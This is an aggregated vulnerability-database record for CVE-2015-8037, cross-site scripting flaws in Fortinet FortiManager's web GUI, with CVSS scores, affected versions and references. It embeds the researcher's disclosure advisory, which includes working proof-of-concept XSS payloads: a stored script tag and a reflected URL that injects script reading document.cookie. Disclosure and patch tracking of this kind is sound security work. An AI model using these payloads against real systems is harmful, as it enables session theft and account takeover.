ID

VAR-201511-0089


CVE

CVE-2015-8037


TITLE

Fortinet FortiManager Graphical user interface cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-005704

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the Graphical User Interface (GUI) in Fortinet FortiManager before 5.2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) SOMVpnSSLPortalDialog or (2) FGDMngUpdHistory. Fortinet FortiManager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. FortiManager 5.2.2 and prior versions are vulnerable. [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt Vendor: ================================ www.fortinet.com Product: ================================ FortiManager v5.2.2 FortiManager is a centralized security management appliance that allows you to centrally manage any number of Fortinet Network Security devices. 2 potential XSS vectors were identified: * XSS vulnerability in SOMVpnSSLPortalDialog. * XSS vulnerability in FGDMngUpdHistory. 2 potential XSS vectors were identified: * XSS vulnerability in sharedjobmanager. * XSS vulnerability in SOMServiceObjDialog. Affected Products XSS items 1-2: FortiManager v5.2.2 or earlier. XSS items 3-4: FortiManager v5.2.3 or earlier. Solutions: =========== No workarounds are currently available. Update to FortiManager v5.2.4. Exploit code(s): =============== 1- Persistent: https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50 <div class="ui-comments-div"><textarea id="_comp_15" name="_comp_15" class="ui-comments-text" cols="58" maxlength="255" maxnum="255" placeholder="Write a comment" rows="1"><script>alert(666)</script></textarea><label class="ui-comments-remaining"> 2- Reflected https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E Disclosure Timeline: ========================================================= Vendor Notification: August 4, 2015 September 24, 2015 : Public Disclosure Exploitation Technique: ======================= Remote & Local Severity Level: ========================================================= Medium (3) Description: ========================================================== Request Method(s): [+] GET Vulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier Vulnerable Parameter(s): [+] vdom, textarea field Affected Area(s): [+] sharedobjmanager, SOMServiceObjDialog =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

Trust: 2.07

sources: NVD: CVE-2015-8037 // JVNDB: JVNDB-2015-005704 // BID: 76847 // VULHUB: VHN-85998 // PACKETSTORM: 133706

AFFECTED PRODUCTS

vendor:fortinetmodel:fortimanagerscope:lteversion:5.2.3

Trust: 1.0

vendor:fortinetmodel:fortimanagerscope:ltversion:5.2.4

Trust: 0.8

vendor:fortinetmodel:fortimanagerscope:eqversion:5.2.3

Trust: 0.6

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.9

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:neversion:5.2.4

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.3

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.10

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.11

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.5

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.8

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.7

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.2

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:3.0

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.2.1

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:4.3

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.6

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.1

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.2.2

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.4

Trust: 0.3

vendor:fortinetmodel:fortimanagerscope:eqversion:5.0.2

Trust: 0.3

sources: BID: 76847 // JVNDB: JVNDB-2015-005704 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-8037
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-8037
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201510-765
value: MEDIUM

Trust: 0.6

VULHUB: VHN-85998
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-8037
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-85998
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-85998 // JVNDB: JVNDB-2015-005704 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-85998 // JVNDB: JVNDB-2015-005704 // NVD: CVE-2015-8037

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201510-765

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 133706 // CNNVD: CNNVD-201510-765

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-005704

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85998

PATCH

title:Multiple XSS vulnerabilities in FortiManager GUIurl:http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui

Trust: 0.8

sources: JVNDB: JVNDB-2015-005704

EXTERNAL IDS

db:NVDid:CVE-2015-8037

Trust: 2.6

db:BIDid:76847

Trust: 0.9

db:JVNDBid:JVNDB-2015-005704

Trust: 0.8

db:CNNVDid:CNNVD-201510-765

Trust: 0.7

db:PACKETSTORMid:133706

Trust: 0.2

db:EXPLOIT-DBid:38316

Trust: 0.1

db:VULHUBid:VHN-85998

Trust: 0.1

sources: VULHUB: VHN-85998 // BID: 76847 // JVNDB: JVNDB-2015-005704 // PACKETSTORM: 133706 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

REFERENCES

url:http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui

Trust: 2.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8037

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8037

Trust: 0.8

url:http://www.securityfocus.com/bid/76847

Trust: 0.6

url:http://hyp3rlinx.altervista.org/advisories/as-fortimanager-xss-0924.txt

Trust: 0.4

url:http://www.fortinet.com/products/fortimanager/

Trust: 0.3

url:https://www.fortinet.com

Trust: 0.1

url:https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/policytable?vdom=%22%27/%3e%3c/script%3e%3cscript%3ealert%28%27[xss%20fortimanager%20poc%20vm64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3c/script%3e

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-8037

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-8038

Trust: 0.1

url:https://localhost/cgi-bin/module/sharedobjmanager/firewall/somserviceobjdialog?devgrpid=18446744073709551615&deviceid=18446744073709551615&vdom=&adomid=3&vdomid=0&adomtype=ems&cate=167&prodid=0&key=all&catetype=167&cate=167&permit_w=1&roid=189&startindex=0&results=50

Trust: 0.1

sources: VULHUB: VHN-85998 // BID: 76847 // JVNDB: JVNDB-2015-005704 // PACKETSTORM: 133706 // CNNVD: CNNVD-201510-765 // NVD: CVE-2015-8037

CREDITS

John Page

Trust: 0.9

sources: BID: 76847 // CNNVD: CNNVD-201510-765

SOURCES

db:VULHUBid:VHN-85998
db:BIDid:76847
db:JVNDBid:JVNDB-2015-005704
db:PACKETSTORMid:133706
db:CNNVDid:CNNVD-201510-765
db:NVDid:CVE-2015-8037

LAST UPDATE DATE

2024-08-14T14:52:18.123000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-85998date:2015-11-03T00:00:00
db:BIDid:76847date:2015-09-24T00:00:00
db:JVNDBid:JVNDB-2015-005704date:2015-11-04T00:00:00
db:CNNVDid:CNNVD-201510-765date:2015-11-03T00:00:00
db:NVDid:CVE-2015-8037date:2015-11-03T23:11:56.133

SOURCES RELEASE DATE

db:VULHUBid:VHN-85998date:2015-11-02T00:00:00
db:BIDid:76847date:2015-09-24T00:00:00
db:JVNDBid:JVNDB-2015-005704date:2015-11-04T00:00:00
db:PACKETSTORMid:133706date:2015-09-25T07:00:13
db:CNNVDid:CNNVD-201510-765date:2015-09-24T00:00:00
db:NVDid:CVE-2015-8037date:2015-11-02T19:59:17.190